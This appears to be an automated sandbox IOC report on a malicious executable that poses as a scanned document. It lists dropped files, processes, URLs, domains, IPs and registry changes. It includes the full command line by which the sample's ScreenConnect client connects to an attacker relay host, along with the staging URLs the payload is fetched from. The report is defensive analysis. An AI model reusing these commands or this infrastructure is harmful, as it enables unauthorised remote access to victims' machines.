IOC Report
Scan_doc_09_16_24_1203.exe

loading gif

Files

File Path
Type
Category
Malicious
Scan_doc_09_16_24_1203.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
 malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x408ee56c, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Scan_doc_09_16_2_aedb73e836754362da95bba687cf27318a3fb5be_aa7badcc_0fa6576a-6384-4927-8d48-c234dc77d347\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8DC.tmp.dmp
Mini DuMP crash report, 14 streams, Wed Oct 2 04:16:18 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB1F.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD14.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD7F.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE8A.tmp.txt
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.cdf-ms
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.en-US.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.resources
data
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\app.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\nkxvqy53.newcfg
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\user.config (copy)
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\5VTPZWXQ.log
Unicode text, UTF-16, little-endian text, with very long lines (623), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\4BCE421K.JDM\960OMTRG.J22.application
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe.genman
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe.manifest
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Windows\System32\user.config
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
There are 66 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe
"C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
 malicious
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
malicious
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "d21d76fd-518c-4e0e-8974-ad827e70c72a" "User"
malicious
C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
"C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "ebaebc1a-63a2-4828-be16-c29c94055c3f" "System"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.config
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe.config
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exe
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.config
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dll
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dll
178.215.236.119
 malicious
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dll
178.215.236.119
 malicious
http://www.fontbureau.com/designersG
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileMana8
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationA
unknown
http://www.fontbureau.com/designers/?
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.dllJ
unknown
http://www.founder.com.cn/cn/bThe
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exeO
unknown
http://www.fontbureau.com/designers?
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Windows.dlll6
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect
unknown
http://www.tiro.com
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllZ
unknown
http://www.fontbureau.com/designers
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application%%%
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dlll7
unknown
http://www.goodfont.co.kr
unknown
http://schemas.micro
unknown
https://cloudfiles-secure.io/Big
unknown
http://www.sajatypeworks.com
unknown
http://www.typography.netD
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
http://www.founder.com.cn/cn/cThe
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Cli
unknown
http://www.galapagosdesign.com/staff/dennis.htm
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.e
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W
unknown
https://g.live.com/odclientsettings/ProdV2
unknown
http://www.xrml.org/schema/2001/11/xrml2coreS
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationlture=neutraQ
unknown
http://cloudfiles-secure.io
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.W0
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationX
unknown
http://www.galapagosdesign.com/DPlease
unknown
http://www.w3.o
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.o
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationEB
unknown
http://www.fonts.com
unknown
http://www.sandoll.co.kr
unknown
http://www.urwpp.deDPlease
unknown
http://www.zhongyicts.com.cn
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.sakkal.com
unknown
http://crl3.digicert.
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exe0
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.e
unknown
http://crl3.digicert.c
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.configC
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationps_
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.fontbureau.com
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsFileManager.exe.p
unknown
http://www.xrml.org/schema/2001/11/xrml2core
unknown
http://schemas.microsoft.
unknown
http://www.w3.or
unknown
http://crl.ver)
unknown
http://upx.sf.net
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applic
unknown
http://www.carterandcone.coml
unknown
http://www.fontbureau.com/designers/cabarga.htmlN
unknown
http://www.founder.com.cn/cn
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationsa
unknown
http://www.fontbureau.com/designers/frere-user.html
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClient.exed
unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
unknown
https://cloudfiles-secure.io
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Win
unknown
http://www.jiyu-kobo.co.jp/
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServi
unknown
https://feedback.screenconnect.com/Feedback.axd
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application
unknown
http://www.fontbureau.com/designers8
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.appli
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.exeo
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application561934e089
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationestn32
unknown
https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsClie
unknown
There are 81 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cloudfiles-secure.io
178.215.236.119
 malicious
ttyuio.zapto.org
178.215.236.119
 malicious
fp2e7a.wpc.phicdn.net
192.229.221.95

IPs

IP
Domain
Country
Malicious
178.215.236.119
cloudfiles-secure.io
Germany
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
ComponentStore_RandomString
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
StateStore_RandomString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}
NonCanonicalData
